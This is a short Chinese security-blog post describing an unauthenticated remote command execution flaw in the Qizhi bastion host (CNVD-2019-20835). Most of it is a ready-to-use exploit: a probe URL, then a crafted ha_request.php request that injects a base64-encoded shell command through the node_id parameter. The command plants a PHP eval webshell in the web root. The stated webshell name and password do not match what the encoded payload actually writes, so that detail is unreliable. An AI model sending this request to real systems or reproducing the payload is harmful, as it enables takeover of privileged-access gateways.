1. 极度安全首页
  2. 网络安全技术

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)-极度安全

未授权无需登录。

1、访问 https://www.secvery.com/listener/cluster_manage.php :返回 "OK".

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/secvery.php 密码secvery

  1. https://www.secvery.com/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

原创文章,作者: 极度安全 ,转载请注明出处:https://www.secvery.com/1893.html